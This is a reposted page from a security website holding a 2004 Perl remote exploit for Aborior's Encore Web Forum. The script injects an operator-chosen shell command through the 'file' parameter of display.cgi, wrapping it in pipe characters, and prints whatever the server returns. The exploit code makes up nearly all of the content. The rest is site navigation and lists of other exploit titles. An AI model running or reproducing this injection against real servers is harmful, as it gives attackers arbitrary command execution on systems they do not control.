首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Remote Exploit for Aborior's Encore Web Forum
来源:g-security.tk 作者:k-159 发布时间:2004-04-12  

Remote Exploit for Aborior's Encore Web Forum

############################################################
#!/usr/bin/perl -w
#
# Remote Exploit Aborior's Encore Web Forum by Schizoprenic
# Bug found by k-159 from g-security.tk

require LWP::UserAgent;
use Getopt::Std;

getopts('t:d:c:');
our($opt_t, $opt_d, $opt_c);

my $target = $opt_t;
my $dir = $opt_d;
my $cmd = $opt_c;

print "Remote Exploit Aborior's Encore Web Forum by Schizoprenic\n";
print "Xnuxer Research Laboratory (http://www.infosekuriti.com)\n";
print "Target: $target\n";
print "Path Dir: $dir\n";
print "Command: $cmd\n";

my $ua = LWP::UserAgent->new;
$ua->agent("IE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$req = "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

my $response = $ua->get($req);
print "--------------------RESULT--------------------\n";

if ($response->is_success) {
print $response->content;
} else {
die $response->status_line;
}

print "----------------------------------------------\n";

# EOF by Xnuxer
--



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RogerWilco 0.4 remote exploit
·Tcpdump ISAKMP payload Integer
·Proof-of-concept exploit code
·IGI 2 <= 1.3 server RCON fo
·Monit <= 4.1 Remote Root Ex
·Symantec Virus Detection Remot
·Panda ActiveScan Control Remot
·eMule <= 0.42d Remote Explo
·FirstClass Desktop 7.1 buffer
·Remote Root Exploit for Monit
·Tcpdump ISAKMP Identification
·IPFW ECE Firewall Bypassing Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved